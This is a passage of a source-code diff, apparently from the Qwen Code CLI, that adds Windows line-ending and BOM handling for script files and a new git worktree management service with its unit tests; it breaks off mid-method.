+5,7 @@ */ import fs from 'node:fs/promises'; +import os from 'node:os'; import * as path from 'node:path'; import { globSync } from 'glob'; import { readFileWithLineAndLimit } from '../utils/fileUtils.js'; @@ -13,6 +14,7 @@ import { iconvEncodingExists, isUtf8CompatibleEncoding, } from '../utils/iconvHelper.js'; +import { getSystemEncoding } from '../utils/systemEncoding.js'; import type { ReadTextFileRequest, WriteTextFileRequest, @@ -83,6 +85,75 @@ export interface WriteTextFileOptions { encoding?: string; } +/** + * File extensions that require CRLF (\r\n) line endings to function correctly. + * cmd.exe parses .bat/.cmd files using CRLF delimiters; LF-only endings can + * break multi-line constructs, labels, and goto statements. + */ +const CRLF_EXTENSIONS = new Set(['.bat', '.cmd']); + +/** + * File extensions that need UTF-8 BOM on Windows with a non-UTF-8 code page. + * PowerShell 5.1 (the version that ships with Windows) reads BOM-less files + * using the system's ANSI code page. Without a BOM, any non-ASCII characters + * in the script will be misinterpreted (e.g. on a GBK system). PowerShell 7+ + * defaults to UTF-8 and handles BOM fine, so adding BOM is always safe. + */ +const UTF8_BOM_EXTENSIONS = new Set(['.ps1']); + +// Cache so we only call getSystemEncoding() once per process +let cachedIsNonUtf8Windows: boolean | undefined; + +/** + * Returns true if a newly created file at the given path should be written + * with a UTF-8 BOM. Conditions (all must be true): + * 1. Running on Windows + * 2. System code page is not UTF-8 + * 3. File extension is in UTF8_BOM_EXTENSIONS (e.g. .ps1) + */ +export function needsUtf8Bom(filePath: string): boolean { + const ext = path.extname(filePath).toLowerCase(); + if (!UTF8_BOM_EXTENSIONS.has(ext)) { + return false; + } + if (cachedIsNonUtf8Windows === undefined) { + if (os.platform() !== 'win32') { + cachedIsNonUtf8Windows = false; + } else { + const sysEnc = getSystemEncoding(); + cachedIsNonUtf8Windows = sysEnc !== 'utf-8'; + } + } + return cachedIsNonUtf8Windows; +} + +/** + * Reset the UTF-8 BOM cache — useful for testing. + */ +export function resetUtf8BomCache(): void { + cachedIsNonUtf8Windows = undefined; +} + +/** + * Returns true if the file at the given path requires CRLF line endings. + * Only applies on Windows where cmd.exe actually parses these files. + */ +function needsCrlfLineEndings(filePath: string): boolean { + if (os.platform() !== 'win32') { + return false; + } + const ext = path.extname(filePath).toLowerCase(); + return CRLF_EXTENSIONS.has(ext); +} + +/** + * Ensures content uses CRLF line endings. First normalizes any existing + * \r\n to \n to avoid double-conversion, then converts all \n to \r\n. + */ +function ensureCrlfLineEndings(content: string): string { + return content.replace(/\r\n/g, '\n').replace(/\n/g, '\r\n'); +} + /** * Return the BOM byte sequence for a given encoding name, or null if the * encoding does not use a standard BOM. Used when writing back a file that @@ -129,7 +200,11 @@ export class StandardFileSystemService implements FileSystemService { async writeTextFile( params: Omit, ): Promise { - const { content, path: filePath, _meta } = params; + const { path: filePath, _meta } = params; + // Convert LF to CRLF for file types that require it (e.g. .bat, .cmd) + const content = needsCrlfLineEndings(filePath) + ? ensureCrlfLineEndings(params.content) + : params.content; const bom = _meta?.['bom'] ?? (false as boolean); const encoding = _meta?.['encoding'] as string | undefined; diff --git a/packages/core/src/services/gitWorktreeService.test.ts b/packages/core/src/services/gitWorktreeService.test.ts new file mode 100644 index 000000000..f34eb1ca2 --- /dev/null +++ b/packages/core/src/services/gitWorktreeService.test.ts @@ -0,0 +1,503 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { beforeEach, describe, expect, it, vi } from 'vitest'; +import type { Mock } from 'vitest'; +import type * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import { GitWorktreeService } from './gitWorktreeService.js'; +import { isCommandAvailable } from '../utils/shell-utils.js'; + +const hoistedMockSimpleGit = vi.hoisted(() => vi.fn()); +const hoistedMockCheckIsRepo = vi.hoisted(() => vi.fn()); +const hoistedMockInit = vi.hoisted(() => vi.fn()); +const hoistedMockAdd = vi.hoisted(() => vi.fn()); +const hoistedMockCommit = vi.hoisted(() => vi.fn()); +const hoistedMockRevparse = vi.hoisted(() => vi.fn()); +const hoistedMockRaw = vi.hoisted(() => vi.fn()); +const hoistedMockBranch = vi.hoisted(() => vi.fn()); +const hoistedMockDiff = vi.hoisted(() => vi.fn()); +const hoistedMockMerge = vi.hoisted(() => vi.fn()); +const hoistedMockStash = vi.hoisted(() => vi.fn()); + +vi.mock('simple-git', () => ({ + simpleGit: hoistedMockSimpleGit, + CheckRepoActions: { IS_REPO_ROOT: 'is-repo-root' }, +})); + +vi.mock('../utils/shell-utils.js', () => ({ + isCommandAvailable: vi.fn(), +})); + +const hoistedMockGetGlobalQwenDir = vi.hoisted(() => vi.fn()); +vi.mock('../config/storage.js', () => ({ + Storage: { + getGlobalQwenDir: hoistedMockGetGlobalQwenDir, + }, +})); + +const hoistedMockFsMkdir = vi.hoisted(() => vi.fn()); +const hoistedMockFsAccess = vi.hoisted(() => vi.fn()); +const hoistedMockFsWriteFile = vi.hoisted(() => vi.fn()); +const hoistedMockFsReaddir = vi.hoisted(() => vi.fn()); +const hoistedMockFsStat = vi.hoisted(() => vi.fn()); +const hoistedMockFsRm = vi.hoisted(() => vi.fn()); +const hoistedMockFsReadFile = vi.hoisted(() => vi.fn()); + +vi.mock('node:fs/promises', async (importOriginal) => { + const actual = await importOriginal(); + return { + ...actual, + mkdir: hoistedMockFsMkdir, + access: hoistedMockFsAccess, + writeFile: hoistedMockFsWriteFile, + readdir: hoistedMockFsReaddir, + stat: hoistedMockFsStat, + rm: hoistedMockFsRm, + readFile: hoistedMockFsReadFile, + }; +}); + +describe('GitWorktreeService', () => { + beforeEach(() => { + vi.clearAllMocks(); + + hoistedMockGetGlobalQwenDir.mockReturnValue('/mock-qwen'); + (isCommandAvailable as Mock).mockReturnValue({ available: true }); + + hoistedMockSimpleGit.mockImplementation(() => ({ + checkIsRepo: hoistedMockCheckIsRepo, + init: hoistedMockInit, + add: hoistedMockAdd, + commit: hoistedMockCommit, + revparse: hoistedMockRevparse, + raw: hoistedMockRaw, + branch: hoistedMockBranch, + diff: hoistedMockDiff, + merge: hoistedMockMerge, + stash: hoistedMockStash, + })); + + hoistedMockCheckIsRepo.mockResolvedValue(true); + hoistedMockInit.mockResolvedValue(undefined); + hoistedMockAdd.mockResolvedValue(undefined); + hoistedMockCommit.mockResolvedValue(undefined); + hoistedMockRevparse.mockResolvedValue('main\n'); + hoistedMockRaw.mockResolvedValue(''); + hoistedMockBranch.mockResolvedValue({ branches: {} }); + hoistedMockDiff.mockResolvedValue(''); + hoistedMockMerge.mockResolvedValue(undefined); + hoistedMockStash.mockResolvedValue(''); + + hoistedMockFsMkdir.mockResolvedValue(undefined); + hoistedMockFsAccess.mockRejectedValue({ code: 'ENOENT' }); + hoistedMockFsWriteFile.mockResolvedValue(undefined); + hoistedMockFsReaddir.mockResolvedValue([]); + hoistedMockFsStat.mockResolvedValue({ birthtimeMs: 123 }); + hoistedMockFsRm.mockResolvedValue(undefined); + hoistedMockFsReadFile.mockResolvedValue('{}'); + }); + + it('checkGitAvailable should return an error when git is unavailable', async () => { + (isCommandAvailable as Mock).mockReturnValue({ available: false }); + const service = new GitWorktreeService('/repo'); + + await expect(service.checkGitAvailable()).resolves.toEqual({ + available: false, + error: 'Git is not installed. Please install Git.', + }); + }); + + it('isGitRepository should fallback to checkIsRepo() when root check throws', async () => { + hoistedMockCheckIsRepo + .mockRejectedValueOnce(new Error('root check failed')) + .mockResolvedValueOnce(true); + const service = new GitWorktreeService('/repo'); + + await expect(service.isGitRepository()).resolves.toBe(true); + expect(hoistedMockCheckIsRepo).toHaveBeenNthCalledWith(1, 'is-repo-root'); + expect(hoistedMockCheckIsRepo).toHaveBeenNthCalledWith(2); + }); + + it('isGitRepository should detect subdirectory inside an existing repo', async () => { + // IS_REPO_ROOT returns false for a subdirectory, but checkIsRepo() + // (without params) returns true because we're inside a repo. + hoistedMockCheckIsRepo + .mockResolvedValueOnce(false) + .mockResolvedValueOnce(true); + const service = new GitWorktreeService('/repo/subdir'); + + await expect(service.isGitRepository()).resolves.toBe(true); + expect(hoistedMockCheckIsRepo).toHaveBeenNthCalledWith(1, 'is-repo-root'); + expect(hoistedMockCheckIsRepo).toHaveBeenNthCalledWith(2); + }); + + it('createWorktree should create a sanitized branch and worktree path', async () => { + const service = new GitWorktreeService('/repo'); + + const result = await service.createWorktree('s1', 'Model A'); + + const expectedPath = path.join( + '/mock-qwen', + 'worktrees', + 's1', + 'worktrees', + 'model-a', + ); + expect(result.success).toBe(true); + expect(result.worktree?.branch).toBe('main-s1-model-a'); + expect(result.worktree?.path).toBe(expectedPath); + expect(hoistedMockRaw).toHaveBeenCalledWith([ + 'worktree', + 'add', + '-b', + 'main-s1-model-a', + expectedPath, + 'main', + ]); + }); + + it('setupWorktrees should fail early for colliding sanitized names', async () => { + const service = new GitWorktreeService('/repo'); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['Model A', 'model_a'], + }); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0]?.error).toContain('collides'); + expect(isCommandAvailable).not.toHaveBeenCalled(); + }); + + it('setupWorktrees should return system error when git is unavailable', async () => { + (isCommandAvailable as Mock).mockReturnValue({ available: false }); + const service = new GitWorktreeService('/repo'); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['model-a'], + }); + + expect(result.success).toBe(false); + expect(result.errors).toEqual([ + { + name: 'system', + error: 'Git is not installed. Please install Git.', + }, + ]); + }); + + it('setupWorktrees should cleanup session after partial creation failure', async () => { + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree') + .mockResolvedValueOnce({ + success: true, + worktree: { + id: 's1/a', + name: 'a', + path: '/w/a', + branch: 'worktrees/s1/a', + isActive: true, + createdAt: 1, + }, + }) + .mockResolvedValueOnce({ + success: false, + error: 'boom', + }); + const cleanupSpy = vi.spyOn(service, 'cleanupSession').mockResolvedValue({ + success: true, + removedWorktrees: [], + removedBranches: [], + errors: [], + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a', 'b'], + }); + + expect(result.success).toBe(false); + expect(result.errors).toContainEqual({ name: 'b', error: 'boom' }); + expect(cleanupSpy).toHaveBeenCalledWith('s1'); + }); + + it('listWorktrees should return empty array when session dir does not exist', async () => { + const err = new Error('missing') as NodeJS.ErrnoException; + err.code = 'ENOENT'; + hoistedMockFsReaddir.mockRejectedValue(err); + const service = new GitWorktreeService('/repo'); + + await expect(service.listWorktrees('missing')).resolves.toEqual([]); + }); + + it('removeWorktree should fallback to fs.rm + worktree prune when git remove fails', async () => { + hoistedMockRaw + .mockRejectedValueOnce(new Error('remove failed')) + .mockResolvedValueOnce(''); + const service = new GitWorktreeService('/repo'); + + const result = await service.removeWorktree('/w/a'); + + expect(result.success).toBe(true); + expect(hoistedMockFsRm).toHaveBeenCalledWith('/w/a', { + recursive: true, + force: true, + }); + expect(hoistedMockRaw).toHaveBeenNthCalledWith(2, ['worktree', 'prune']); + }); + + it('cleanupSession should remove branches from listed worktrees', async () => { + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'listWorktrees').mockResolvedValue([ + { + id: 's1/a', + name: 'a', + path: '/w/a', + branch: 'main-s1-a', + isActive: true, + createdAt: Date.now(), + }, + { + id: 's1/b', + name: 'b', + path: '/w/b', + branch: 'main-s1-b', + isActive: true, + createdAt: Date.now(), + }, + ]); + vi.spyOn(service, 'removeWorktree').mockResolvedValue({ success: true }); + + const result = await service.cleanupSession('s1'); + + expect(result.success).toBe(true); + expect(result.removedBranches).toEqual(['main-s1-a', 'main-s1-b']); + expect(hoistedMockBranch).toHaveBeenCalledWith(['-D', 'main-s1-a']); + expect(hoistedMockBranch).toHaveBeenCalledWith(['-D', 'main-s1-b']); + expect(hoistedMockRaw).toHaveBeenCalledWith(['worktree', 'prune']); + }); + + it('getWorktreeDiff should return staged raw diff without creating commits', async () => { + const service = new GitWorktreeService('/repo'); + hoistedMockDiff.mockResolvedValue('diff --git a/a.ts b/a.ts'); + + const diff = await service.getWorktreeDiff('/w/a', 'main'); + + expect(diff).toBe('diff --git a/a.ts b/a.ts'); + expect(hoistedMockAdd).toHaveBeenCalledWith(['--all']); + expect(hoistedMockDiff).toHaveBeenCalledWith([ + '--binary', + '--cached', + 'main', + ]); + expect(hoistedMockCommit).not.toHaveBeenCalled(); + }); + + it('applyWorktreeChanges should apply raw patch via git apply', async () => { + const service = new GitWorktreeService('/repo'); + // resolveBaseline returns the baseline commit SHA + hoistedMockRaw + .mockResolvedValueOnce('baseline-sha\n') // resolveBaseline log --grep + .mockResolvedValueOnce('') // reset (from withStagedChanges) + .mockResolvedValueOnce(''); // git apply + hoistedMockDiff.mockResolvedValueOnce('diff --git a/a.ts b/a.ts'); + + const result = await service.applyWorktreeChanges('/w/a', '/repo'); + + expect(result.success).toBe(true); + expect(hoistedMockAdd).toHaveBeenCalledWith(['--all']); + // Should diff against the baseline commit, not merge-base + expect(hoistedMockDiff).toHaveBeenCalledWith([ + '--binary', + '--cached', + 'baseline-sha', + ]); + + const applyCall = hoistedMockRaw.mock.calls.find( + (call) => Array.isArray(call[0]) && call[0][0] === 'apply', + ); + expect(applyCall).toBeDefined(); + // When baseline is used, --3way is omitted (target working tree + // matches the pre-image, so plain apply works cleanly). + expect(applyCall?.[0]?.slice(0, 2)).toEqual([ + 'apply', + '--whitespace=nowarn', + ]); + expect(hoistedMockFsWriteFile).toHaveBeenCalled(); + expect(hoistedMockFsRm).toHaveBeenCalledWith( + expect.stringContaining('.worktree-apply-'), + { force: true }, + ); + }); + + it('applyWorktreeChanges should skip apply when patch is empty', async () => { + const service = new GitWorktreeService('/repo'); + // resolveBaseline returns baseline commit + hoistedMockRaw.mockResolvedValueOnce('baseline-sha\n'); + hoistedMockDiff.mockResolvedValueOnce(' \n'); + + const result = await service.applyWorktreeChanges('/w/a', '/repo'); + + expect(result.success).toBe(true); + const applyCall = hoistedMockRaw.mock.calls.find( + (call) => Array.isArray(call[0]) && call[0][0] === 'apply', + ); + expect(applyCall).toBeUndefined(); + expect(hoistedMockFsWriteFile).not.toHaveBeenCalled(); + }); + + it('applyWorktreeChanges should return error when git apply fails', async () => { + const service = new GitWorktreeService('/repo'); + // resolveBaseline returns baseline commit + hoistedMockRaw + .mockResolvedValueOnce('baseline-sha\n') // resolveBaseline + .mockResolvedValueOnce('') // reset from withStagedChanges + .mockRejectedValueOnce(new Error('apply failed')); + hoistedMockDiff.mockResolvedValueOnce('diff --git a/a.ts b/a.ts'); + + const result = await service.applyWorktreeChanges('/w/a', '/repo'); + + expect(result.success).toBe(false); + expect(result.error).toContain('apply failed'); + expect(hoistedMockFsRm).toHaveBeenCalledWith( + expect.stringContaining('.worktree-apply-'), + { force: true }, + ); + }); + + describe('dirty state propagation', () => { + function makeWorktreeInfo( + name: string, + sessionId: string, + ): { + id: string; + name: string; + path: string; + branch: string; + isActive: boolean; + createdAt: number; + } { + return { + id: `${sessionId}/${name}`, + name, + path: `/mock-qwen/worktrees/${sessionId}/worktrees/${name}`, + branch: `worktrees/${sessionId}/${name}`, + isActive: true, + createdAt: 1, + }; + } + + it('setupWorktrees should apply dirty state snapshot to each worktree', async () => { + hoistedMockStash.mockResolvedValue('snapshot-sha\n'); + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree') + .mockResolvedValueOnce({ + success: true, + worktree: makeWorktreeInfo('a', 's1'), + }) + .mockResolvedValueOnce({ + success: true, + worktree: makeWorktreeInfo('b', 's1'), + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a', 'b'], + }); + + expect(result.success).toBe(true); + expect(hoistedMockStash).toHaveBeenCalledWith(['create']); + // stash apply should be called once per worktree + const stashApplyCalls = hoistedMockRaw.mock.calls.filter( + (call: unknown[]) => + Array.isArray(call[0]) && + call[0][0] === 'stash' && + call[0][1] === 'apply', + ); + expect(stashApplyCalls).toHaveLength(2); + expect(stashApplyCalls[0]![0]).toEqual([ + 'stash', + 'apply', + 'snapshot-sha', + ]); + }); + + it('setupWorktrees should skip stash apply when working tree is clean', async () => { + hoistedMockStash.mockResolvedValue('\n'); + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree').mockResolvedValue({ + success: true, + worktree: makeWorktreeInfo('a', 's1'), + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a'], + }); + + expect(result.success).toBe(true); + const stashApplyCalls = hoistedMockRaw.mock.calls.filter( + (call: unknown[]) => + Array.isArray(call[0]) && + call[0][0] === 'stash' && + call[0][1] === 'apply', + ); + expect(stashApplyCalls).toHaveLength(0); + }); + + it('setupWorktrees should still succeed when stash apply fails', async () => { + hoistedMockStash.mockResolvedValue('snapshot-sha\n'); + hoistedMockRaw.mockRejectedValue(new Error('stash apply conflict')); + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree').mockResolvedValue({ + success: true, + worktree: makeWorktreeInfo('a', 's1'), + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a'], + }); + + // Setup should still succeed — dirty state failure is non-fatal + expect(result.success).toBe(true); + expect(result.errors).toHaveLength(0); + }); + + it('setupWorktrees should still succeed when stash create fails', async () => { + hoistedMockStash.mockRejectedValue(new Error('stash create failed')); + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree').mockResolvedValue({ + success: true, + worktree: makeWorktreeInfo('a', 's1'), + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a'], + }); + + // Setup should still succeed — stash create failure is non-fatal + expect(result.success).toBe(true); + expect(result.errors).toHaveLength(0); + }); + }); +}); diff --git a/packages/core/src/services/gitWorktreeService.ts b/packages/core/src/services/gitWorktreeService.ts new file mode 100644 index 000000000..6ceebf11e --- /dev/null +++ b/packages/core/src/services/gitWorktreeService.ts @@ -0,0 +1,826 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import { execSync } from 'node:child_process'; +import { simpleGit, CheckRepoActions } from 'simple-git'; +import type { SimpleGit } from 'simple-git'; +import { Storage } from '../config/storage.js'; +import { isCommandAvailable } from '../utils/shell-utils.js'; +import { isNodeError } from '../utils/errors.js'; + +/** + * Commit message used for the baseline snapshot in worktrees. + * After overlaying the user's dirty state (tracked changes + untracked files), + * a commit with this message is created so that later diffs only capture the + * agent's changes — not the pre-existing local edits. + */ +export const BASELINE_COMMIT_MESSAGE = 'baseline (dirty state overlay)'; + +/** + * Default directory and branch-prefix name used for worktrees. + * Changing this value affects the on-disk layout (`~/.qwen//`) + * **and** the default git branch prefix (`//…`). + */ +export const WORKTREES_DIR = 'worktrees'; + +export interface WorktreeInfo { + /** Unique identifier for this worktree */ + id: string; + /** Display name (e.g., model name) */ + name: string; + /** Absolute path to the worktree directory */ + path: string; + /** Git branch name for this worktree */ + branch: string; + /** Whether the worktree is currently active */ + isActive: boolean; + /** Creation timestamp */ + createdAt: number; +} + +export interface WorktreeSetupConfig { + /** Session identifier */ + sessionId: string; + /** Source repository path (project root) */ + sourceRepoPath: string; + /** Names/identifiers for each worktree to create */ + worktreeNames: string[]; + /** Base branch to create worktrees from (defaults to current branch) */ + baseBranch?: string; + /** Extra metadata to persist alongside the session config */ + metadata?: Record; +} + +export interface CreateWorktreeResult { + success: boolean; + worktree?: WorktreeInfo; + error?: string; +} + +export interface WorktreeSetupResult { + success: boolean; + sessionId: string; + worktrees: WorktreeInfo[]; + worktreesByName: Record; + errors: Array<{ name: string; error: string }>; +} + +/** + * Minimal session config file written to disk. + * Callers can extend via the `metadata` field in WorktreeSetupConfig. + */ +interface SessionConfigFile { + sessionId: string; + sourceRepoPath: string; + worktreeNames: string[]; + baseBranch?: string; + createdAt: number; + [key: string]: unknown; +} + +/** + * Service for managing git worktrees. + * + * Git worktrees allow multiple working directories to share a single repository, + * enabling isolated environments without copying the entire repo. + */ +export class GitWorktreeService { + private sourceRepoPath: string; + private git: SimpleGit; + private readonly customBaseDir?: string; + + constructor(sourceRepoPath: string, customBaseDir?: string) { + this.sourceRepoPath = path.resolve(sourceRepoPath); + this.git = simpleGit(this.sourceRepoPath); + this.customBaseDir = customBaseDir; + } + + /** + * Gets the directory where worktrees are stored. + * @param customDir - Optional custom base directory override + */ + static getBaseDir(customDir?: string): string { + if (customDir) { + return path.resolve(customDir); + } + return path.join(Storage.getGlobalQwenDir(), WORKTREES_DIR); + } + + /** + * Gets the directory for a specific session. + * @param customBaseDir - Optional custom base directory override + */ + static getSessionDir(sessionId: string, customBaseDir?: string): string { + return path.join(GitWorktreeService.getBaseDir(customBaseDir), sessionId); + } + + /** + * Gets the worktrees directory for a specific session. + * @param customBaseDir - Optional custom base directory override + */ + static getWorktreesDir(sessionId: string, customBaseDir?: string): string { + return path.join( + GitWorktreeService.getSessionDir(sessionId, customBaseDir), + WORKTREES_DIR, + ); + } + + /** + * Instance-level base dir, using the custom dir if provided at construction. + */ + getBaseDirForInstance(): string { + return GitWorktreeService.getBaseDir(this.customBaseDir); + } + + /** + * Checks if git is available on the system. + */ + async checkGitAvailable(): Promise<{ available: boolean; error?: string }> { + const { available } = isCommandAvailable('git'); + if (!available) { + return { + available: false, + error: 'Git is not installed. Please install Git.', + }; + } + return { available: true }; + } + + /** + * Checks if the source path is a git repository. + */ + async isGitRepository(): Promise { + try { + const isRoot = await this.git.checkIsRepo(CheckRepoActions.IS_REPO_ROOT); + if (isRoot) { + return true; + } + } catch { + // IS_REPO_ROOT check failed — fall through to the general check + } + // Not the root (or root check threw) — check if we're inside a git repo + try { + return await this.git.checkIsRepo(); + } catch { + return false; + } + } + + /** + * Initializes the source directory as a git repository. + * Returns true if initialization was performed, false if already a repo. + */ + async initializeRepository(): Promise<{ + initialized: boolean; + error?: string; + }> { + const isRepo = await this.isGitRepository(); + if (isRepo) { + return { initialized: false }; + } + + try { + await this.git.init(false, { '--initial-branch': 'main' }); + + // Create initial commit so we can create worktrees + await this.git.add('.'); + await this.git.commit('Initial commit', { + '--allow-empty': null, + }); + + return { initialized: true }; + } catch (error) { + return { + initialized: false, + error: `Failed to initialize git repository: ${error instanceof Error ? error.message : 'Unknown error'}`, + }; + } + } + + /** + * Gets the current branch name. + */ + async getCurrentBranch(): Promise { + const branch = await this.git.revparse(['--abbrev-ref', 'HEAD']); + return branch.trim(); + } + + /** + * Gets the current commit hash. + */ + async getCurrentCommitHash(): Promise { + const hash = await this.git.revparse(['HEAD']); + return hash.trim(); + } + + /** + * Creates a single worktree. + */ + async createWorktree( + sessionId: string, + name: string, + baseBranch?: string, + ): Promise { + try { + const worktreesDir = GitWorktreeService.getWorktreesDir( + sessionId, + this.customBaseDir, + ); + await fs.mkdir(worktreesDir, { recursive: true }); + + // Sanitize name for use as branch and directory name + const sanitizedName = this.sanitizeName(name); + const worktreePath = path.join(worktreesDir, sanitizedName); + + // Check if worktree already exists + const exists = await this.pathExists(worktreePath); + if (exists) { + return { + success: false, + error: `Worktree already exists at ${worktreePath}`, + }; + } + + // Determine base branch + const base = baseBranch || (await this.getCurrentBranch()); + const shortSession = sessionId.slice(0, 6); + const branchName = `${base}-${shortSession}-${sanitizedName}`; + + // Create the worktree with a new branch + await this.git.raw([ + 'worktree', + 'add', + '-b', + branchName, + worktreePath, + base, + ]); + + const worktree: WorktreeInfo = { + id: `${sessionId}/${sanitizedName}`, + name, + path: worktreePath, + branch: branchName, + isActive: true, + createdAt: Date.now(), + }; + + return { success: true, worktree }; + } catch (error) { + return { + success: false, + error: `Failed to create worktree for "${name}": ${error instanceof Error ? error.message : 'Unknown error'}`, + }; + } + } + + /** + * Sets up all worktrees for a session. + * This is the main entry point for worktree creation. + */ + async setupWorktrees( + config: WorktreeSetupConfig, + ): Promise { + const result: WorktreeSetupResult = { + success: false, + sessionId: config.sessionId, + worktrees: [], + worktreesByName: {}, + errors: [], + }; + + // Validate worktree names early (before touching git) + const sanitizedNames = new Map(); + for (const name of config.worktreeNames) { + const sanitized = this.sanitizeName(name); + if (!sanitized) { + result.errors.push({ + name, + error: 'Worktree name becomes empty after sanitization', + }); + continue; + } + const existing = sanitizedNames.get(sanitized); + if (existing) { + result.errors.push({ + name, + error: `Worktree name collides with "${existing}" after sanitization`, + }); + continue; + } + sanitizedNames.set(sanitized, name); + } + if (result.errors.length > 0) { + return result; + } + + // Check git availability + const gitCheck = await this.checkGitAvailable(); + if (!gitCheck.available) { + result.errors.push({ name: 'system', error: gitCheck.error! }); + return result; + } + + // Ensure source is a git repository + const isRepo = await this.isGitRepository(); + if (!isRepo) { + result.errors.push({ + name: 'repository', + error: 'Source path is not a git repository.', + }); + return result; + } + + // Create session directory + const sessionDir = GitWorktreeService.getSessionDir( + config.sessionId, + this.customBaseDir, + ); + await fs.mkdir(sessionDir, { recursive: true }); + + // Save session config for later reference + const configPath = path.join(sessionDir, 'config.json'); + const configFile: SessionConfigFile = { + sessionId: config.sessionId, + sourceRepoPath: config.sourceRepoPath, + worktreeNames: config.worktreeNames, + baseBranch: config.baseBranch, + createdAt: Date.now(), + ...config.metadata, + }; + await fs.writeFile(configPath, JSON.stringify(configFile, null, 2)); + + // Capture the current dirty state (tracked: staged + unstaged changes) + // without modifying the source working tree or index. + // NOTE: `git stash create` does NOT support --include-untracked; + // untracked files are handled separately below via file copy. + let dirtyStateSnapshot = ''; + try { + dirtyStateSnapshot = (await this.git.stash(['create'])).trim(); + } catch { + // Ignore — proceed without dirty state if stash create fails + } + + // Discover untracked files so they can be copied into each worktree. + // `git ls-files --others --exclude-standard` is read-only and safe. + let untrackedFiles: string[] = []; + try { + const raw = await this.git.raw([ + 'ls-files', + '--others', + '--exclude-standard', + ]); + untrackedFiles = raw.trim().split('\n').filter(Boolean); + } catch { + // Non-fatal: proceed without untracked files + } + + // Create worktrees for each entry + for (const name of config.worktreeNames) { + const createResult = await this.createWorktree( + config.sessionId, + name, + config.baseBranch, + ); + + if (createResult.success && createResult.worktree) { + result.worktrees.push(createResult.worktree); + result.worktreesByName[name] = createResult.worktree; + } else { + result.errors.push({ + name, + error: createResult.error || 'Unknown error', + }); + } + } + + // If any worktree failed, clean up all created resources and fail + if (result.errors.length > 0) { + try { + await this.cleanupSession(config.sessionId); + } catch (error) { + result.errors.push({ + name: 'cleanup', + error: `Failed to cleanup after partial worktree creation: ${error instanceof Error ? error.message : 'Unknown error'}`, + }); + } + result.success = false; + return result; + } + + // Success only if all worktrees were created + result.success = result.worktrees.length === config.worktreeNames.length; + + // Overlay the source repo's dirty state onto each worktree so agents + // see the same files the user currently has on disk. + if (result.success) { + for (const worktree of result.worktrees) { + const wtGit = simpleGit(worktree.path); + + // 1. Apply tracked dirty changes (staged + unstaged) + if (dirtyStateSnapshot) { + try { + await wtGit.raw(['stash', 'apply', dirtyStateSnapshot]); + } catch { + // Non-fatal: worktree still usable with committed state only + } + } + + // 2. Copy untracked files into the worktree + for (const relPath of untrackedFiles) { + try { + const src = path.join(this.sourceRepoPath, relPath); + const dst = path.join(worktree.path, relPath); + await fs.mkdir(path.dirname(dst), { recursive: true }); + await fs.copyFile(src, dst); + } catch { + // Non-fatal: skip files that can't be copied + } + } + + // 3. Create a baseline commit capturing the full starting state + // (committed + dirty + untracked). This allows us to later diff + // only the agent's changes, excluding the pre-existing dirty state. + try { + await wtGit.add(['--all']); + await wtGit.commit(BASELINE_COMMIT_MESSAGE, { + '--allow-empty': null, + '--no-verify': null, + }); + } catch { + // Non-fatal: diff will fall back to merge-base if baseline is missing + } + } + } + + return result; + } + + /** + * Lists all worktrees for a session. + */ + async listWorktrees(sessionId: string): Promise { + const worktreesDir = GitWorktreeService.getWorktreesDir( + sessionId, + this.customBaseDir, + ); + + try { + const entries = await fs.readdir(worktreesDir, { withFileTypes: true }); + const worktrees: WorktreeInfo[] = []; + + for (const entry of entries) { + if (entry.isDirectory()) { + const worktreePath = path.join(worktreesDir, entry.name); + + // Read the actual branch from the worktree + let branchName = ''; + try { + branchName = execSync('git rev-parse --abbrev-ref HEAD', { + cwd: worktreePath, + encoding: 'utf8', + stdio: ['pipe', 'pipe', 'pipe'], + }).trim(); + } catch { + // Fallback if git command fails + } + + // Try to get stats for creation time + let createdAt = Date.now(); + try { + const stats = await fs.stat(worktreePath); + createdAt = stats.birthtimeMs; + } catch { + // Ignore stat errors + } + + worktrees.push({ + id: `${sessionId}/${entry.name}`, + name: entry.name, + path: worktreePath, + branch: branchName, + isActive: true, + createdAt, + }); + } + } + + return worktrees; + } catch (error) { + if (isNodeError(error) && error.code === 'ENOENT') { + return []; + } + throw error; + } + } + + /** + * Removes a single worktree. + */ + async removeWorktree( + worktreePath: string, + ): Promise<{ success: boolean; error?: string }> { + try { + // Remove the worktree from git + await this.git.raw(['worktree', 'remove', worktreePath, '--force']); + return { success: true }; + } catch (error) { + // Try to remove the directory manually if git worktree remove fails + try { + await fs.rm(worktreePath, { recursive: true, force: true }); + // Prune worktree references + await this.git.raw(['worktree', 'prune']); + return { success: true }; + } catch (_rmError) { + return { + success: false, + error: `Failed to remove worktree: ${error instanceof Error ? error.message : 'Unknown error'}`, + }; + } + } + } + + /** + * Cleans up all worktrees and branches for a session. + */ + async 